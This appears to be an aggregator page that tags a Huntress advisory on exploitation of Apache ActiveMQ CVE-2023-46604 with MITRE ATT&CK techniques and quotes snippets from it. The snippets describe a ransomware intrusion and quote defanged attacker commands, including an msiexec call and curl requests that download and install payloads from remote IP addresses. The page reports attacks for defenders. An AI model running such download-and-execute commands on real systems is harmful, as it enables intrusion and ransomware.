TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Critical Vuln: Apache ActiveMQ CVE-2023-46604 Exploited | Huntress

2023-11-02 · Read original ↗

ATT&CK techniques detected

5 predictions
T1190Exploit Public-Facing Application
74%
"critical vuln : apache activemq cve - 2023 - 46604 exploited | huntress a partner recently deployed huntress agents on october 30, 2023, after experiencing a “ hellokitty ” ransomware attack on october 27. this ransomware attack followed closely with what was described by rapid7 …"
T1190Exploit Public-Facing Application
61%
"activemq via the openwire protocol, typically running on port 61616. - by sending a crafted openwire packet, the attacker prompts the system to unmarshal a class they control. this action triggers the vulnerable server to fetch and load a class configuration xml file from a remot…"
T1218.007Msiexec
51%
". ] 125 / m4. png and http : / / 172. 245. 16 [. ] 125 / m2. png. however, neither package appeared to install successfully. one of the packages failed to install due to an error with c : \ windows \ installer \ msib9e7. tmp, and the other completed, but c : \ windows \ installer…"
T1059.001PowerShell
43%
"agent _ w. exe was quarantined, analysis of the retrieved file indicates that it attempts to connect to 137. 175. 17 [. ] 172. on november 2, the huntress team was alerted to multiple endpoints executing curl requests via the url hxxp : / / 27. 102. 128 [. ] 152 : 8098 / bit [. ]…"
T1218.007Msiexec
33%
"figure 3, appears as follows : c : \ mrx \ apache \ activemq \ bin \ win64 \ wrapper. exe - > c : \ program files ( x86 ) \ common files \ oracle \ java \ javapath \ java. exe - > “ cmd. exe / c msiexec / q / i http : / / 4. 216. 93 [. ] 211 : 5981 / runtimebroker. msi ” the comm…"

Summary

CVE-2023-46604 is a critical remote code execution vulnerability in Apache ActiveMQ. Patch now to avoid any potential adversary exploitation.